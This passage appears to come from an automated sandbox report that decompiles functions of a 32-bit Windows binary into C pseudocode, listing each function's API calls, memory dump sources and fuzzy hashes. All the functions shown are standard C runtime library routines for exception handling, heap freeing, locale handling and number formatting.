                    • Instruction ID: d9b0b9fd459113351f921aa778dd8b20b1cf5d34ba7c7a55e35930b3a3d7b7cc
                    • Opcode Fuzzy Hash: ce7b5e8e5fb3aa8fe84a3559882d5a7ebb0664181da7507086c62e3b69baa235
                    • Instruction Fuzzy Hash: B1418272A006059BDB24AF65888459FBBB9EF80360B24C53EE865B72D0D778DD419B8C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E0040D245(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                    				intOrPtr _t48;
                    				void* _t53;
                    				intOrPtr _t57;
                    				void* _t58;
                    				void* _t61;
                    
                    				_t61 = __eflags;
                    				_push(0x2c);
                    				_push(0x4183e0);
                    				E00409480(__ebx, __edi, __esi);
                    				_t48 = __ecx;
                    				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                    				_t57 =  *((intOrPtr*)(_t58 + 8));
                    				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                    				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                    				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                    				 *((intOrPtr*)(_t58 - 0x28)) = E004079A6(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                    				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00408BF1(__ecx, _t53, _t61) + 0x88));
                    				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00408BF1(_t48, _t53, _t61) + 0x8c));
                    				 *((intOrPtr*)(E00408BF1(_t48, _t53, _t61) + 0x88)) = _t57;
                    				 *((intOrPtr*)(E00408BF1(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                    				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                    				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                    				 *(_t58 - 4) = 1;
                    				 *((intOrPtr*)(_t58 - 0x1c)) = E00407A4B(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                    				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                    				 *(_t58 - 4) = 0xfffffffe;
                    				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                    				E0040D36B(_t48, _t53, _t55, _t57, _t61);
                    				return E004094C5( *((intOrPtr*)(_t58 - 0x1c)));
                    			}









                    APIs
                    • __CreateFrameInfo.LIBCMT ref: 0040D26D
                      • Part of subcall function 004079A6: __getptd.LIBCMT ref: 004079B4
                      • Part of subcall function 004079A6: __getptd.LIBCMT ref: 004079C2
                    • __getptd.LIBCMT ref: 0040D277
                      • Part of subcall function 00408BF1: __getptd_noexit.LIBCMT ref: 00408BF4
                      • Part of subcall function 00408BF1: __amsg_exit.LIBCMT ref: 00408C01
                    • __getptd.LIBCMT ref: 0040D285
                    • __getptd.LIBCMT ref: 0040D293
                    • __getptd.LIBCMT ref: 0040D29E
                    • _CallCatchBlock2.LIBCMT ref: 0040D2C4
                      • Part of subcall function 00407A4B: __CallSettingFrame@12.LIBCMT ref: 00407A97
                      • Part of subcall function 0040D36B: __getptd.LIBCMT ref: 0040D37A
                      • Part of subcall function 0040D36B: __getptd.LIBCMT ref: 0040D388
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                    • String ID:
                    • API String ID: 1602911419-0
                    • Opcode ID: ec31f0ee46d81a317718e44662539a2bb57a752aafd447310979ada468aa2085
                    • Instruction ID: 8dbbb1d19d37c023a1572d48ec851b1baeccfae569e00c14c3edc3fd44107886
                    • Opcode Fuzzy Hash: ec31f0ee46d81a317718e44662539a2bb57a752aafd447310979ada468aa2085
                    • Instruction Fuzzy Hash: B1110AB1D04209DFDB00EFA5C546ADDB7B0FF04314F10846EF854A7292DB389A159F59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 52%
                    			E0040CF94(void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
                    				signed int _v8;
                    				void* __ebp;
                    				intOrPtr* _t15;
                    				intOrPtr* _t18;
                    				void* _t22;
                    
                    				_t24 = __edi;
                    				_t23 = __edx;
                    				_t30 =  *((intOrPtr*)( *_a4)) - 0xe0434f4d;
                    				if( *((intOrPtr*)( *_a4)) == 0xe0434f4d) {
                    					__eflags =  *((intOrPtr*)(E00408BF1(_t22, __edx, __eflags) + 0x90));
                    					if(__eflags > 0) {
                    						_t15 = E00408BF1(_t22, __edx, __eflags) + 0x90;
                    						 *_t15 =  *_t15 - 1;
                    						__eflags =  *_t15;
                    					}
                    					goto L9;
                    				} else {
                    					__eflags = __eax - 0xe06d7363;
                    					if(__eflags != 0) {
                    						L9:
                    						__eflags = 0;
                    						return 0;
                    					} else {
                    						 *(E00408BF1(__ebx, __edx, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
                    						_push(8);
                    						_push(0x418100);
                    						E00409480(_t22, __edi, __esi);
                    						_t18 =  *((intOrPtr*)(E00408BF1(_t22, __edx, _t30) + 0x78));
                    						if(_t18 != 0) {
                    							_v8 = _v8 & 0x00000000;
                    							 *_t18();
                    							_v8 = 0xfffffffe;
                    						}
                    						return E004094C5(E0040B345(_t22, _t23, _t24));
                    					}
                    				}
                    			}









                    APIs
                    • __getptd.LIBCMT ref: 0040CFAE
                      • Part of subcall function 00408BF1: __getptd_noexit.LIBCMT ref: 00408BF4
                      • Part of subcall function 00408BF1: __amsg_exit.LIBCMT ref: 00408C01
                    • __getptd.LIBCMT ref: 0040CFBF
                    • __getptd.LIBCMT ref: 0040CFCD
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit__getptd_noexit
                    • String ID: MOC$csm
                    • API String ID: 803148776-1389381023
                    • Opcode ID: b3493c5c61a86f34dbd88dc2e54a74ec28ef5841e110d946c934a748e88883d4
                    • Instruction ID: b817c59e2ff2b00f7bfd91d48eda6a7b39b0a1c60efee0b81e92e7cb3a07f843
                    • Opcode Fuzzy Hash: b3493c5c61a86f34dbd88dc2e54a74ec28ef5841e110d946c934a748e88883d4
                    • Instruction Fuzzy Hash: BEE01A75500105CFC710ABA9C186B2933A6EB48319F5909BBF44DE73E3DB7CE950AA4B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E00410158(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                    				signed int _t15;
                    				LONG* _t21;
                    				long _t23;
                    				void* _t31;
                    				LONG* _t33;
                    				void* _t34;
                    				void* _t35;
                    
                    				_t35 = __eflags;
                    				_t29 = __edx;
                    				_t25 = __ebx;
                    				_push(0xc);
                    				_push(0x418520);
                    				E00409480(__ebx, __edi, __esi);
                    				_t31 = E00408BF1(__ebx, __edx, _t35);
                    				_t15 =  *0x41aed8; // 0xfffffffe
                    				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                    					E0040E117(_t25, _t31, 0xd);
                    					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                    					_t33 =  *(_t31 + 0x68);
                    					 *(_t34 - 0x1c) = _t33;
                    					__eflags = _t33 -  *0x41add0; // 0xb91610
                    					if(__eflags != 0) {
                    						__eflags = _t33;
                    						if(_t33 != 0) {
                    							_t23 = InterlockedDecrement(_t33);
                    							__eflags = _t23;
                    							if(_t23 == 0) {
                    								__eflags = _t33 - 0x41a9a8;
                    								if(__eflags != 0) {
                    									_push(_t33);
                    									E00408391(_t25, _t31, _t33, __eflags);
                    								}
                    							}
                    						}
                    						_t21 =  *0x41add0; // 0xb91610
                    						 *(_t31 + 0x68) = _t21;
                    						_t33 =  *0x41add0; // 0xb91610
                    						 *(_t34 - 0x1c) = _t33;
                    						InterlockedIncrement(_t33);
                    					}
                    					 *(_t34 - 4) = 0xfffffffe;
                    					E004101F3();
                    				} else {
                    					_t33 =  *(_t31 + 0x68);
                    				}
                    				if(_t33 == 0) {
                    					E0040C2BD(_t29, 0x20);
                    				}
                    				return E004094C5(_t33);
                    			}











                    APIs
                    • __getptd.LIBCMT ref: 00410164
                      • Part of subcall function 00408BF1: __getptd_noexit.LIBCMT ref: 00408BF4
                      • Part of subcall function 00408BF1: __amsg_exit.LIBCMT ref: 00408C01
                    • __amsg_exit.LIBCMT ref: 00410184
                    • __lock.LIBCMT ref: 00410194
                    • InterlockedDecrement.KERNEL32(?), ref: 004101B1
                    • InterlockedIncrement.KERNEL32(00B91610), ref: 004101DC
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                    • String ID:
                    • API String ID: 4271482742-0
                    • Opcode ID: 0ae42d1af5b45461503a632c2f752f2cfab7af00a2c38ef18795a6d473f346cf
                    • Instruction ID: de8b3edfefe574bfed8f34b7f7893f6631444417f3520d658e7e7bb1693974ed
                    • Opcode Fuzzy Hash: 0ae42d1af5b45461503a632c2f752f2cfab7af00a2c38ef18795a6d473f346cf
                    • Instruction Fuzzy Hash: 4201A132902711ABC712AB6598057CE7360BB04725F14812BF800776D1CBBDADD1DBCE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 39%
                    			E00408391(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                    				intOrPtr* _t10;
                    				intOrPtr _t13;
                    				intOrPtr _t23;
                    				void* _t25;
                    
                    				_push(0xc);
                    				_push(0x4181c8);
                    				_t8 = E00409480(__ebx, __edi, __esi);
                    				_t23 =  *((intOrPtr*)(_t25 + 8));
                    				if(_t23 == 0) {
                    					L9:
                    					return E004094C5(_t8);
                    				}
                    				if( *0x480164 != 3) {
                    					_push(_t23);
                    					L7:
                    					if(HeapFree( *0x47ef44, 0, ??) == 0) {
                    						_t10 = E00407E97();
                    						 *_t10 = E00407E55(GetLastError());
                    					}
                    					goto L9;
                    				}
                    				E0040E117(__ebx, __edi, 4);
                    				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                    				_t13 = E0040E14A(_t23);
                    				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                    				if(_t13 != 0) {
                    					_push(_t23);
                    					_push(_t13);
                    					E0040E17A();
                    				}
                    				 *(_t25 - 4) = 0xfffffffe;
                    				_t8 = E004083E7();
                    				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                    					goto L9;
                    				} else {
                    					_push( *((intOrPtr*)(_t25 + 8)));
                    					goto L7;
                    				}
                    			}








                    APIs
                    • __lock.LIBCMT ref: 004083AF
                      • Part of subcall function 0040E117: __mtinitlocknum.LIBCMT ref: 0040E12D
                      • Part of subcall function 0040E117: __amsg_exit.LIBCMT ref: 0040E139
                      • Part of subcall function 0040E117: EnterCriticalSection.KERNEL32(?,?,?,0041497B,00000004,004186A8,0000000C,00410670,?,?,00000000,00000000,00000000,?,00408BA3,00000001), ref: 0040E141
                    • ___sbh_find_block.LIBCMT ref: 004083BA
                    • ___sbh_free_block.LIBCMT ref: 004083C9
                    • HeapFree.KERNEL32(00000000,?,004181C8,0000000C,0040E0F8,00000000,00418480,0000000C,0040E132,?,?,?,0041497B,00000004,004186A8,0000000C), ref: 004083F9
                    • GetLastError.KERNEL32(?,0041497B,00000004,004186A8,0000000C,00410670,?,?,00000000,00000000,00000000,?,00408BA3,00000001,00000214), ref: 0040840A
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                    • String ID:
                    • API String ID: 2714421763-0
                    • Opcode ID: 41028ddc3cd4b07aad9b2cba660ac9ec1c66c9dd65b33da2e68891c717245daf
                    • Instruction ID: 22cb6e104ee26a05c1c6c528a598d7dae73e29afa4cc1c2644510d068b8e4df0
                    • Opcode Fuzzy Hash: 41028ddc3cd4b07aad9b2cba660ac9ec1c66c9dd65b33da2e68891c717245daf
                    • Instruction Fuzzy Hash: 53014F31905312AADF206B72AE06B5F3A649F40B68F10057FF454BA1D2DF3D99409A9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 24%
                    			E0040D5F2(void* __ebx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                    				void* __ebp;
                    				void* _t20;
                    				void* _t22;
                    				void* _t23;
                    				void* _t25;
                    				intOrPtr* _t26;
                    				void* _t27;
                    				void* _t28;
                    
                    				_t27 = __esi;
                    				_t26 = __edi;
                    				_t22 = __ebx;
                    				_t30 = _a20;
                    				if(_a20 != 0) {
                    					_push(_a20);
                    					_push(__ebx);
                    					_push(__esi);
                    					_push(_a4);
                    					E0040D560(__ebx, __edi, __esi, _t30);
                    					_t28 = _t28 + 0x10;
                    				}
                    				_t31 = _a28;
                    				_push(_a4);
                    				if(_a28 != 0) {
                    					_push(_a28);
                    				} else {
                    					_push(_t27);
                    				}
                    				E004076FE(_t23);
                    				_push( *_t26);
                    				_push(_a16);
                    				_push(_a12);
                    				_push(_t27);
                    				E0040CFDD(_t22, _t25, _t26, _t27, _t31);
                    				_push(0x100);
                    				_push(_a24);
                    				_push(_a16);
                    				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
                    				_push(_a8);
                    				_push(_t27);
                    				_push(_a4);
                    				_t20 = E0040D245(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t26, _t27, _t31);
                    				if(_t20 != 0) {
                    					E004076B7(_t20, _t27);
                    					return _t20;
                    				}
                    				return _t20;
                    			}












                    APIs
                    • ___BuildCatchObject.LIBCMT ref: 0040D605
                      • Part of subcall function 0040D560: ___BuildCatchObjectHelper.LIBCMT ref: 0040D596
                    • _UnwindNestedFrames.LIBCMT ref: 0040D61C
                    • ___FrameUnwindToState.LIBCMT ref: 0040D62A
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                    • String ID: csm
                    • API String ID: 2163707966-1018135373
                    • Opcode ID: b4d94f597d3ad86545263278c3b3b403363400864d43045d366ef1f28234a2c8
                    • Instruction ID: d35a8aa292447e6ee848d16faf3c13964287127bbe11df6dd513262f860d8648
                    • Opcode Fuzzy Hash: b4d94f597d3ad86545263278c3b3b403363400864d43045d366ef1f28234a2c8
                    • Instruction Fuzzy Hash: 2B012835800109BBCF126F92CC41EAB7F6AEF58358F044426BD18251A1DB3B99A1DBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 65%
                    			E004124B9() {
                    				signed long long _v12;
                    				signed int _v20;
                    				signed long long _v28;
                    				signed char _t8;
                    
                    				_t8 = GetModuleHandleA("KERNEL32");
                    				if(_t8 == 0) {
                    					L6:
                    					_v20 =  *0x403fb0;
                    					_v28 =  *0x403fa8;
                    					asm("fsubr qword [ebp-0x18]");
                    					_v12 = _v28 / _v20 * _v20;
                    					asm("fld1");
                    					asm("fcomp qword [ebp-0x8]");
                    					asm("fnstsw ax");
                    					if((_t8 & 0x00000005) != 0) {
                    						return 0;
                    					} else {
                    						return 1;
                    					}
                    				} else {
                    					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                    					if(__eax == 0) {
                    						goto L6;
                    					} else {
                    						_push(0);
                    						return __eax;
                    					}
                    				}
                    			}








                    APIs
                    • GetModuleHandleA.KERNEL32(KERNEL32,0040ADDA), ref: 004124BE
                    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004124CE
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: IsProcessorFeaturePresent$KERNEL32
                    • API String ID: 1646373207-3105848591
                    • Opcode ID: ee63b53c3bbb647226da7baed89e2ad2b98daf95e994082500fc9f6d6cffe820
                    • Instruction ID: a718abd4de27ec464f4a226fc57991b239694793ee379156b5c450683665b3fc
                    • Opcode Fuzzy Hash: ee63b53c3bbb647226da7baed89e2ad2b98daf95e994082500fc9f6d6cffe820
                    • Instruction Fuzzy Hash: 73F03031A00A0AE2DF001FA1BE0E6AFBE79BB80742F9105A1D5D1F00D4DF7481F5824A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00415A20(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                    				intOrPtr _v8;
                    				signed int _v12;
                    				char _v20;
                    				signed int _t54;
                    				intOrPtr _t56;
                    				int _t57;
                    				int _t58;
                    				signed short* _t59;
                    				short* _t60;
                    				int _t65;
                    				char* _t72;
                    
                    				_t72 = _a8;
                    				if(_t72 == 0 || _a12 == 0) {
                    					L5:
                    					return 0;
                    				} else {
                    					if( *_t72 != 0) {
                    						E0040988F( &_v20, _a16);
                    						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
                    							if(E0041188B( *_t72 & 0x000000ff,  &_v20) == 0) {
                    								if(MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
                    									L10:
                    									if(_v8 != 0) {
                    										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                    									}
                    									return 1;
                    								}
                    								L21:
                    								_t54 = E00407E97();
                    								 *_t54 = 0x2a;
                    								if(_v8 != 0) {
                    									_t54 = _v12;
                    									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
                    								}
                    								return _t54 | 0xffffffff;
                    							}
                    							_t56 = _v20;
                    							_t65 =  *(_t56 + 0xac);
                    							if(_t65 <= 1 || _a12 < _t65) {
                    								L17:
                    								if(_a12 <  *(_t56 + 0xac) || _t72[1] == 0) {
                    									goto L21;
                    								} else {
                    									goto L19;
                    								}
                    							} else {
                    								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                    								_t56 = _v20;
                    								if(_t58 != 0) {
                    									L19:
                    									_t57 =  *(_t56 + 0xac);
                    									if(_v8 == 0) {
                    										return _t57;
                    									}
                    									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                    									return _t57;
                    								}
                    								goto L17;
                    							}
                    						}
                    						_t59 = _a4;
                    						if(_t59 != 0) {
                    							 *_t59 =  *_t72 & 0x000000ff;
                    						}
                    						goto L10;
                    					} else {
                    						_t60 = _a4;
                    						if(_t60 != 0) {
                    							 *_t60 = 0;
                    						}
                    						goto L5;
                    					}
                    				}
                    			}















                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00415A54
                    • __isleadbyte_l.LIBCMT ref: 00415A88
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,004064C0,?,00000000,00000000,?,?,?,?,004064C0,00000000), ref: 00415AB9
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,004064C0,00000001,00000000,00000000,?,?,?,?,004064C0,00000000), ref: 00415B27
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: 6bbddb5c765605a2ee9faf2e327f1788629c22512bf335d802b0b67d74e5ce3c
                    • Instruction ID: 9b812e5c8a2dfed52fa7c33654fea10736fda5f2b97d3e828d9e3610f20b48e7
                    • Opcode Fuzzy Hash: 6bbddb5c765605a2ee9faf2e327f1788629c22512bf335d802b0b67d74e5ce3c
                    • Instruction Fuzzy Hash: 3C31B231A40646EFDB20DFA4C8D09FE3BB5BF81391F1886AAE4619B291D334DD80DB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004123A5(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                    				intOrPtr _t25;
                    				void* _t26;
                    				void* _t28;
                    
                    				_t25 = _a16;
                    				if(_t25 == 0x65 || _t25 == 0x45) {
                    					_t26 = E00411C96(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                    					goto L9;
                    				} else {
                    					_t34 = _t25 - 0x66;
                    					if(_t25 != 0x66) {
                    						__eflags = _t25 - 0x61;
                    						if(_t25 == 0x61) {
                    							L7:
                    							_t26 = E00411D86(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                    						} else {
                    							__eflags = _t25 - 0x41;
                    							if(__eflags == 0) {
                    								goto L7;
                    							} else {
                    								_t26 = E004122AB(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                    							}
                    						}
                    						L9:
                    						return _t26;
                    					} else {
                    						return E004121F0(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                    					}
                    				}
                    			}







                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                    • Instruction ID: 8f06ba0e6be14d774fc29792ef997f0c6ad8488ad82e83f8fd62a1598589dc5c
                    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                    • Instruction Fuzzy Hash: D5118C3204014EBBCF165F85DD01CEE3F62BB18354B588416FE2898131D37AC9B2AB96
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E0040FEBC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                    				signed int _t13;
                    				intOrPtr _t27;
                    				intOrPtr _t29;
                    				void* _t30;
                    				void* _t31;
                    
                    				_t31 = __eflags;
                    				_t26 = __edi;
                    				_t25 = __edx;
                    				_t22 = __ebx;
                    				_push(0xc);
                    				_push(0x418500);
                    				E00409480(__ebx, __edi, __esi);
                    				_t29 = E00408BF1(__ebx, __edx, _t31);
                    				_t13 =  *0x41aed8; // 0xfffffffe
                    				if(( *(_t29 + 0x70) & _t13) == 0) {
                    					L6:
                    					E0040E117(_t22, _t26, 0xc);
                    					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                    					_t8 = _t29 + 0x6c; // 0x6c
                    					_t27 =  *0x41a998; // 0x41a8c0
                    					 *((intOrPtr*)(_t30 - 0x1c)) = E0040FE7E(_t8, _t27);
                    					 *(_t30 - 4) = 0xfffffffe;
                    					E0040FF26();
                    				} else {
                    					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
                    					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
                    						goto L6;
                    					} else {
                    						_t29 =  *((intOrPtr*)(E00408BF1(_t22, __edx, _t33) + 0x6c));
                    					}
                    				}
                    				if(_t29 == 0) {
                    					E0040C2BD(_t25, 0x20);
                    				}
                    				return E004094C5(_t29);
                    			}









                    APIs
                    • __getptd.LIBCMT ref: 0040FEC8
                      • Part of subcall function 00408BF1: __getptd_noexit.LIBCMT ref: 00408BF4
                      • Part of subcall function 00408BF1: __amsg_exit.LIBCMT ref: 00408C01
                    • __getptd.LIBCMT ref: 0040FEDF
                    • __amsg_exit.LIBCMT ref: 0040FEED
                    • __lock.LIBCMT ref: 0040FEFD
                    Memory Dump Source
                    • Source File: 00000006.00000002.559566612.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.559558113.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559582134.000000000041A000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559590275.000000000041F000.00000008.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559641579.000000000047E000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000006.00000002.559650279.0000000000482000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_586.jbxd
                    Similarity
                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                    • String ID:
